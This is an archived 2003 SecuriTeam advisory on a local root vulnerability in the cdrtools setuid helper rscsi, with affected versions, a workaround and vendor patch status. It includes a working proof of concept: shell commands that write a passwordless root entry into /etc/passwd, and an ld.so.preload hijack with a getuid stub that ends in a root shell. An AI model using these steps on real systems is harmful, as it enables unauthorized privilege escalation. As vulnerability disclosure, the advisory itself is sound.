[EXPL] Cdrtools Local Root Exploit

From: SecuriTeam (support_at_securiteam.com)
Date: 08/05/03

  • Next message: SecuriTeam: "[UNIX] Posfix Remote DoS / Postfix Bounce Scanning" 
    To: list@securiteam.com
Date: 5 Aug 2003 11:41:57 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Get Thawte's New Step-by-Step SSL Guide for MSIIS

    In this guide you will find out how to test, purchase, install
    and use a Thawte Digital Certificate on your MSIIS web server.
    Throughout, best practices for set-up are highlighted to help you
    ensure efficient ongoing management of your encryption keys and digital
    certificates. Get your copy of this new guide now:
    http://ad.doubleclick.net/clk;5903126;8265119;j

    - - - - - - - - -

      Cdrtools Local Root Exploit
    ------------------------------------------------------------------------

    SUMMARY

     
    <http://www.fokus.gmd.de/research/cc/glone/employees/joerg.schilling/private/cdrecord.html> Cdrecord supports DVD-R and DVD-RW with all known DVD-writers on all UNIX like operating systems and on Win32. A setuid helper binary has been found to contain a vulnerability that allows files to be overwritten by non-root users.

    DETAILS

    Vulnerable Systems:
     * cdrtools version 2.x and below

    Immune Systems:
     * cdrtools version 2.01a18

    A vulnerability in cdrtools allows local attackers to overwrite files, one
    side effect of the overwriting process is that the file's permissions
    becomes writable by the user calling the rscsi program. This can allow a
    non-root user to take local root on the machine that has cdrtools
    installed.

    Initial attempts to exploit this issue failed for an unknown reason...
    this however this is still a valid method of attack. We make use of the
    first argument passed to rscsi in order to choose the file we wish to
    write to.

    Due to the output from rscsi we make use of 0x08 in order to delete some
    of the characters that otherwise would be written. This attack method
    relies on placing a line of text at the end of a file. Please note that 2
    other lines of garbage will be placed in the file that may cause other
    issues.

    Proff of Concept:
    elguapo@gentoo elguapo $ echo C`echo -e
    "\x08\x08\x08\x08\x08\x08\x08\x08\x08\x08r00t::0:0:root:/:/bin/bash\x0a"`
    | /opt/schily/sbin/rscsi /tmp/lala
    Segmentation fault (this segfault is not related to the security issue)

    elguapo@gentoo elguapo $ cat /tmp/lala
    rscsid: user id 1000, name elguapo
    rmt: stdin is a PIPE
    r00t::0:0:root:/root:/bin/bash

    When attempting to echo this line to the password file we get the
    following error (Note that the password file is overwritten at this
    point):

    E0
    Illegal user id for RSCSI server
    0

    elguapo@gentoo elguapo $ cat /etc/passwd
    rscsid: Illegal user '(NULL POINTER)' id 1000 for RSCSI server
    rscsid:>E 0 (Illegal user id for RSCSI server) []

    We do however have another exploitation option, such as the one listed
    below:

    [kf@vegeta kf]$ ls -al /etc/ld.so.preload
    ls: /etc/ld.so.preload: No such file or directory

    [kf@vegeta kf]$ cat > oops.c
    int getuid(void)
    {
    return(0);
    }

    [kf@vegeta kf]$ gcc -c -o oops.o oops.c
    [kf@vegeta kf]$ ld -shared -o oops.so oops.o
    [kf@vegeta kf]$ ls -al oops.so
    -rwxrwxr-x 1 kf kf 1714 Jul 30 18:53 oops.so

    [kf@vegeta kf]$ echo duh_kf | /opt/schily/sbin/rscsi /etc/ld.so.preload
    E0
    Garbage command
    0

    Note that we now have write permissions to /etc/ld.so.preload
    -rw-rw-r-- 1 root kf 1 Jul 30 19:29 /etc/ld.so.preload

    So to gain elevated privileges all we need to do is:
    [kf@vegeta kf]$ echo /home/kf/oops.so > /etc/ld.so.preload
    [kf@vegeta kf]$ su
    [root@vegeta kf]# rm /etc/ld.so.preload
    rm: remove regular file `/etc/ld.so.preload'? y
    [root@vegeta kf]# id
    uid=0(root) gid=0(root)
    groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)

    Workaround:
    chmod -s /opt/schily/sbin/rscsi

    Vendor Status:
    The problem has been patched in cdrtools version 2.01a18.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:kf@secnetops.com > KF

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] Posfix Remote DoS / Postfix Bounce Scanning"